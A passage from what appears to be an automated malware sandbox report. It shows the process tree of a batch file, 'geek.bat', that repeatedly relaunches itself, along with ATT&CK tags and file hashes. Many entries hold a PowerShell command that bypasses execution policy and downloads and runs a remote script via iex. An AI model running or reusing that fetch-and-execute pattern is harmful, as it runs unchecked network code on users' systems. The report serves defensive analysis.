        C:\Windows\system32\cmd.exe /c ver
        94⤵
        
        PID:3032
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        94⤵
        
        PID:3392
        
        C:\Windows\system32\chcp.com
        
        chcp
        95⤵
        
        PID:3368
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        94⤵
        
        PID:640
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        94⤵
        
        PID:724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        94⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        94⤵
        Blocklisted process makes network request
        
        PID:4856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        94⤵
        
        PID:4808
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        95⤵
        
        PID:4948
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        96⤵
        
        PID:4264
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        96⤵
        
        PID:860
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        96⤵
        
        PID:2904
        
        C:\Windows\system32\chcp.com
        
        chcp
        97⤵
        
        PID:4368
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        96⤵
        
        PID:3568
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        96⤵
        
        PID:1836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        96⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        96⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:4384
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        96⤵
        
        PID:1272
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        97⤵
        
        PID:4492
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        98⤵
        
        PID:4420
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        98⤵
        
        PID:944
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        98⤵
        
        PID:4624
        
        C:\Windows\system32\chcp.com
        
        chcp
        99⤵
        
        PID:2816
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        98⤵
        
        PID:924
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        98⤵
        
        PID:3916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        98⤵
        
        PID:2708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        98⤵
        Blocklisted process makes network request
        
        PID:3936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        98⤵
        
        PID:2084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        99⤵
        
        PID:1808
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        100⤵
        
        PID:1716
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        100⤵
        
        PID:5028
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        100⤵
        
        PID:972
        
        C:\Windows\system32\chcp.com
        
        chcp
        101⤵
        
        PID:2288
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        100⤵
        
        PID:2360
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        100⤵
        
        PID:2324
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        100⤵
        
        PID:4740
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        100⤵
        Blocklisted process makes network request
        
        PID:724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        100⤵
        
        PID:3616
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        101⤵
        
        PID:1812
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        102⤵
        
        PID:1848
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        102⤵
        
        PID:3188
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        102⤵
        
        PID:752
        
        C:\Windows\system32\chcp.com
        
        chcp
        103⤵
        
        PID:4084
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        102⤵
        
        PID:1584
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        102⤵
        
        PID:3892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        102⤵
        
        PID:4928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        102⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:4540
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        102⤵
        
        PID:4604
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        103⤵
        
        PID:4256
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        104⤵
        
        PID:1544
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        104⤵
        
        PID:2216
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        104⤵
        
        PID:2556
        
        C:\Windows\system32\chcp.com
        
        chcp
        105⤵
        
        PID:1272
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        104⤵
        
        PID:3168
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        104⤵
        
        PID:2460
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        104⤵
        
        PID:3536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        104⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:4784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        104⤵
        
        PID:2968
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        105⤵
        
        PID:4244
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        106⤵
        
        PID:5004
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        106⤵
        
        PID:2988
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        106⤵
        
        PID:3888
        
        C:\Windows\system32\chcp.com
        
        chcp
        107⤵
        
        PID:4812
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        106⤵
        
        PID:4656
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        106⤵
        
        PID:2848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        106⤵
        
        PID:3148
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        106⤵
        Blocklisted process makes network request
        
        PID:3392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        106⤵
        
        PID:3868
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        107⤵
        
        PID:1748
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        108⤵
        
        PID:4940
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        108⤵
        
        PID:4856
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        108⤵
        
        PID:3616
        
        C:\Windows\system32\chcp.com
        
        chcp
        109⤵
        
        PID:2688
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        108⤵
        
        PID:4300
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        108⤵
        
        PID:5100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        108⤵
        
        PID:1848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        108⤵
        Blocklisted process makes network request
        
        PID:400
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        108⤵
        
        PID:4896
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        109⤵
        
        PID:792
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        110⤵
        
        PID:3876
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        110⤵
        
        PID:4444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        110⤵
        
        PID:1816
        
        C:\Windows\system32\chcp.com
        
        chcp
        111⤵
        
        PID:4152
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        110⤵
        
        PID:1828
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        110⤵
        
        PID:448
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        110⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        110⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:2928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        110⤵
        
        PID:1444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        111⤵
        
        PID:2500
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        112⤵
        
        PID:1188
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        112⤵
        
        PID:2568
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        112⤵
        
        PID:4600
        
        C:\Windows\system32\chcp.com
        
        chcp
        113⤵
        
        PID:2548
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        112⤵
        
        PID:2084
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        112⤵
        
        PID:1048
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        112⤵
        
        PID:1592
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        112⤵
        Blocklisted process makes network request
        
        PID:1716
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        112⤵
        
        PID:2744
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        113⤵
        
        PID:4092
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        114⤵
        
        PID:4804
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        114⤵
        
        PID:672
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        114⤵
        
        PID:2196
        
        C:\Windows\system32\chcp.com
        
        chcp
        115⤵
        
        PID:3156
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        114⤵
        
        PID:2688
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        114⤵
        
        PID:1932
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        114⤵
        
        PID:2388
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        114⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:2992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        114⤵
        
        PID:5032
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        115⤵
        
        PID:4860
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        116⤵
        
        PID:4604
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        116⤵
        
        PID:1812
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        116⤵
        
        PID:3472
        
        C:\Windows\system32\chcp.com
        
        chcp
        117⤵
        
        PID:3468
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        116⤵
        
        PID:1544
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        116⤵
        
        PID:1600
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        116⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        116⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:1164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        116⤵
        
        PID:1984
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        117⤵
        
        PID:2552
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        118⤵
        
        PID:792
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        118⤵
        
        PID:4384
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        118⤵
        
        PID:1940
        
        C:\Windows\system32\chcp.com
        
        chcp
        119⤵
        
        PID:5004
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        118⤵
        
        PID:316
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        118⤵
        
        PID:2700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        118⤵
        
        PID:2248
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        118⤵
        Blocklisted process makes network request
        
        PID:3492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        118⤵
        
        PID:4436
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        119⤵
        
        PID:3672
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        120⤵
        
        PID:4304
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        120⤵
        
        PID:2296
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        120⤵
        
        PID:4672
        
        C:\Windows\system32\chcp.com
        
        chcp
        121⤵
        
        PID:2588
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        120⤵
        
        PID:4532
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        120⤵
        
        PID:852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        120⤵
        
        PID:2968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        120⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:4944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        120⤵
        
        PID:2676
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        121⤵
        
        PID:1644
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        122⤵
        
        PID:3080
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        122⤵
        
        PID:1364
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        122⤵
        
        PID:1112
        
        C:\Windows\system32\chcp.com
        
        chcp
        123⤵
        
        PID:2144
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        122⤵
        
        PID:4540
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        122⤵
        
        PID:1344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        122⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        122⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        
        PID:3472
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        122⤵
        
        PID:3580
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        123⤵
        
        PID:1120
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        124⤵
        
        PID:3936
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        124⤵
        
        PID:1860
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        124⤵
        
        PID:4788
        
        C:\Windows\system32\chcp.com
        
        chcp
        125⤵
        
        PID:2928
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        124⤵
        
        PID:3540
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        124⤵
        
        PID:4880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        124⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2984
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        124⤵
        Blocklisted process makes network request
        
        PID:2340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        124⤵
        
        PID:5036
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        125⤵
        
        PID:3392
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        126⤵
        
        PID:4724
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        126⤵
        
        PID:1856
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        126⤵
        
        PID:516
        
        C:\Windows\system32\chcp.com
        
        chcp
        127⤵
        
        PID:1704
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        126⤵
        
        PID:888
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        126⤵
        
        PID:2948
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        126⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        126⤵
        Blocklisted process makes network request
        
        PID:2588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        126⤵
        
        PID:1808
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        127⤵
        
        PID:4084
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        128⤵
        
        PID:1016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        128⤵
        
        PID:2440
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        128⤵
        
        PID:4756
        
        C:\Windows\system32\chcp.com
        
        chcp
        129⤵
        
        PID:2992
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        128⤵
        
        PID:2388
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        128⤵
        
        PID:3568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        128⤵
        
        PID:4504
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        128⤵
        
        PID:1804
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat"'
        128⤵
        
        PID:4244
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Files\Apps\geek.bat" "
        129⤵
        
        PID:1272
        
        C:\Windows\system32\fltMC.exe
        
        fltmc
        130⤵
        
        PID:4184
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ver
        130⤵
        
        PID:4764
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c chcp
        130⤵
        
        PID:216
        
        C:\Windows\system32\chcp.com
        
        chcp
        131⤵
        
        PID:2452
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        130⤵
        
        PID:2712
        
        C:\Windows\system32\chcp.com
        
        chcp 437
        130⤵
        
        PID:2664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy AllSigned
        130⤵
        
        PID:1780
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))
        130⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3936

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\chocolatey\choco.exe

Filesize
11.1MB

MD5
5bd9b752aea9efb5b02fe30d82e7e4d4

SHA1
450df051653ba65d1068c76a2f117f7e0cc543c9

SHA256
bb69a5899e7d260853e73c7f2a11d92702abc72aca01aadf08172ea87921466a

SHA512
edaf5633ab49b9540d85e7b4d184d26dfa374a193aff629c0fc043bb31aea48edabcc4ec7126e4842e3217b976f8225988655a140386a4518b529cea7cde4933

Download Submit
C:\ProgramData\chocolatey\config\chocolatey.config.4168.update

Filesize
8KB

MD5
a3f016f5f2bd742ff1591950260f6f75

SHA1
7feabbcc2e2d51c09065071f58da23990e215b72

SHA256
6621f97fca4589b04e4c9a835344371fc3ecdf1f4cdac5c1492c05fcc23629f3

SHA512
